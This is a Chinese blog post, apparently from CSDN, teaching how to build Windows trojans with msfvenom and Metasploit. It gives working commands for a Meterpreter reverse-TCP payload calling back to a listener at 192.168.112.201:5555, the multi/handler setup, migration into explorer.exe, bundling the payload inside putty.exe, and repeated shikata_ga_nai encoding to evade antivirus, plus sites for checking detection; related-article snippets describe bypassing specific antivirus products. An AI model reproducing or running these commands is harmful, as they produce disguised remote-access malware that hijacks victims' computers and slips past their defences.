木马与免杀(1), msfvenom 工具, 木马生成, 编码免杀, 在线木马检测

最新推荐文章于 2024-07-03 18:59:45 发布
最新推荐文章于 2024-07-03 18:59:45 发布
阅读量867 收藏 14
点赞数 2
分类专栏: 渗透测试-入侵提权 文章标签: 网络 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bua200720411091/article/details/134837324
版权

Msfvenom是Metasploit框架中的一个强大工具,用于生成定制的恶意软件载荷,包括反向Shell、Meterpreter Shell、编码的Payload等[3]。它主要用来生成带后门的软件,是Msfpayload和Msfencode的组合,用于生成木马和软件捆绑后门[1][2][4]。在Kali Linux中有一个集成好的工具是msfvenom,主要用于生成后门和软件捆绑后门,其免杀效果还算不错[5]。

1. 生成木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 -f exe -o shell.exe

2. 监听木马

在攻击端使用监听模块:
use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

这里看到默认使用的是 generic/shell_reverse_tcp , 我们修改为自己的 windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

查看payload选项:
show options

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

监听的配置需要与木马一致.
这里默认监听的是4444端口, 修改为自己的木马端口:
set lport 5555

lport => 5555

设置木马的 lhost:
set lhost 192.168.112.201

lhost => 192.168.112.201

开启监听:
run

[*] Started reverse TCP handler on 192.168.112.201:5555

到目标主机运行shell.exe木马后, 回到msf等待连接.

5. 进程注入

木马运行后注入到主机的explorer.exe进程中, 即使shell.exe进程结束也不影响木马工作.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 prependmigrateprocess=explorer.exe prpendmigrate=true -f exe -o shell2.exe

6. 程序捆绑

将木马与其他exe程序进行捆绑, 生成一个新的exe程序, 当程序运行的同时也执行木马.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 -a x86 --platform windows -x putty.exe -k -f exe -o shell3.exe

7. 编码免杀

使用 shikata_ga_nai 编码进行10次编码.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.201 LPORT=5555 -e x86/shikata_ga_nai -i 10 -f exe -o shell4.exe

8. 在线检测木马

https://www.virustotal.com
https://www.virscan.org/language/zh-cn

9. 查看支持的格式

msfvenom --list formats

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    ducky-script-psh
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    go
    golang
    hex
    java
    js_be
    js_le
    masm
    nim
    nimlang
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    rust
    rustlang
    sh
    vbapplication
    vbscript

10. 查看所有编码器

Framework Encoders [--encoder <value>]
======================================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder
    x86/xor_poly                  normal     XOR POLY Encoder
DeltaTime
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
Kali渗透-MSF木马免杀技术
热门推荐
道阻且长,行则将至。
03-27 2万+
裸奔木马 1、在 Kali 中直接使用 Msfvenom 生成木马文件,不做任何免杀处理,如下图所示: 2、在 Kali 开启 Apache 服务,同一局域网内的 Win 10 物理主机访问木马文件,尝试下载: 3、结果 Win 10 物理主机的火绒安全软件自动识别木马,并自动将其移除至病毒隔离区: 4、手动从病毒隔离区移出木马QQ.exe,上传至腾讯哈勃分析系统进行在线病毒识别分析,结果只是“轻...
Msfvenom编码免杀技术实现免杀实战
weixin_43062666的博客
07-10 2979
免杀技术在网络渗透的实战中十分实用,本文将介绍使用msfvenom自带编码免杀工具进行编码免杀,从而实现绕过杀毒软件获得shell的具体方法。 按照文中所讲述的方法制作的木马载荷可以绕开国内所使用的大多数杀毒软件,包括但不限于火绒,腾讯,百度,金山,virustotal沙箱查杀率12,简单但实用...
利用msfvenom制作windows木马免杀
最新发布
aheyor的博客
07-03 803
注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。原文链接:https://blog.csdn.net/qq_43332640/article/details/124072802。第四步:将生成的捆绑木马发到windows主机,并且打开msf的监听模块。第二步:打开kali启动msfvenom,制作木马。第三步:木马捆绑,(主程序启动之后子程序随之启动)
msf免杀木马生成
qq_66985187的博客
07-04 2353
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msf(msfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
使用msfvenom免杀火绒
2301_76718200的博客
11-11 922
本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win。2、再使用msfvenom生成一个捆绑可以被windows执行的exe木马文件。3、把刚刚生成的exe木马文件传输到我们的win11物理机上。1、首先到火绒官网上下载个火绒安装包后放到kali中。#修改成我们之前生成木马时使用的payload。前提把杀软关闭要不然会杀掉,没有做免杀木马。靶机,启动火绒点击我们编译过的木马程序。点击后就连接上我们的kali攻击机了。#设置kali的IP地址为监听地址。
msfvenom 生成 免杀
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-19 426
1)PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程。2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为c。生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。shikata_ga_nai 是只支持32位的,所以一定不能用64位编译。
网络攻防作业——Msfvenom的使用
yyy7654321的博客
06-28 2758
2. 利用建立的监听连接,进行渗透测试操作(上传、下载、提权、获取Wifi密码、拍照、监控屏幕、进程迁移、保持永久、修改文件日期等等)。1.利用Msfvenom生成木马,并进行免杀处理,再利用msfconsole进行监听;3.把生成的windows下可执行的exe文件复制到靶机。5.在靶机打开生成的abc.exe文件,开始监听。2. Msfvenom生成Payload。4.msfconsole开启监听。1.打开软件Msfvenom。6. 进行渗透测试操作。
基于变形方法的网页木马免杀相关技术分析.pdf
04-07
木马导致的网络不安全性已经引起了社会各界的普遍关注,尤其是网络木马带来的盗号、流氓软件、拒服务供给等黑客行为给人们的工作和生活带来了较大的安全隐患,所以加强对基于变形方法网页木马免杀的研究力度具有非常...
木马免杀文档
11-17
无奈没见哪为朋友综合系统的介绍,也苦了小菜们求学无门,只好掏银子找“师傅”,所以我就自告奋勇站出来一次,不足之处还请各位高手多多包涵…… 我个人总结的免杀方法总共分两类,即主动免杀与被动免杀
浴血凤凰2012最新木马免杀教程第一课
02-26
免杀教程可能会教授如何修改木马的特征码,或者利用动态生成代码的方式,使得每次运行的木马特征码都不同,从而避开静态检测。 3. **进程注入与隐藏**:将木马程序注入到正常进程中,利用系统的进程保护机制隐藏...
ASP木马免杀方法 比较全
12-16
ASP木马免杀方法 比较全的资料。通俗易懂
Metasploit 生成木马
2201_75516783的博客
11-28 779
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的 msfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
远控免杀学习笔记-msfvenom自带免杀
m0_49025459的博客
04-10 689
生成的payload.exe在/home/kali/.msf4/local/目录下,然后扔沙箱里看一下。
后渗透-木马免杀
qq_43381463的博客
02-25 776
木马免杀的方法有很多种,如反转、异或、远程加载、加壳等,这里举例反转加异或
使用Metasploit生成木马控制Windows系统
weixin_56956399的博客
04-12 2216
使用Metasploit生成木马控制Windows系统
关于内网穿透真实案例讲解
qq_36585338的博客
02-13 883
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 Kali 0x006内网穿透—数据转发 ​ GitHub - shellfeel/Ant-AntV: 一个经过实战考验的免杀程序生成器 MSF监听会话
【记录】kali制作绕过火绒检测木马(仅通过MSF的方式)
jennycisp的博客
12-26 2495
apt-get update报错关于kali2019.4的更新源 (任意选择其中一组就可用,我选的清华源)#清华大学#阿里云#中科大#浙大最后最后,上面安装的虚拟机在 apt-get update 之后的 apt-get upgrade报错,原因找了很久,发现可能是因为kali版本和VMware版本相差太远以至于update的包安装覆盖之类的问题导致报错。-----然后我重新下载了iso镜像,kali2021.4版本。结果upgrade还是有问题,甚至还upgrade之后莫名其妙连不上网络
深度解析:木马免杀技术与策略
免杀技术的发展与杀毒软件的进步是相辅相成的,黑客们不断尝试创新方法以绕过杀毒软件的检测,而安全专家也在不断升级防御手段以应对这些挑战。因此,对于网络安全从业者来说,了解和掌握免杀技术是提升自身能力的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值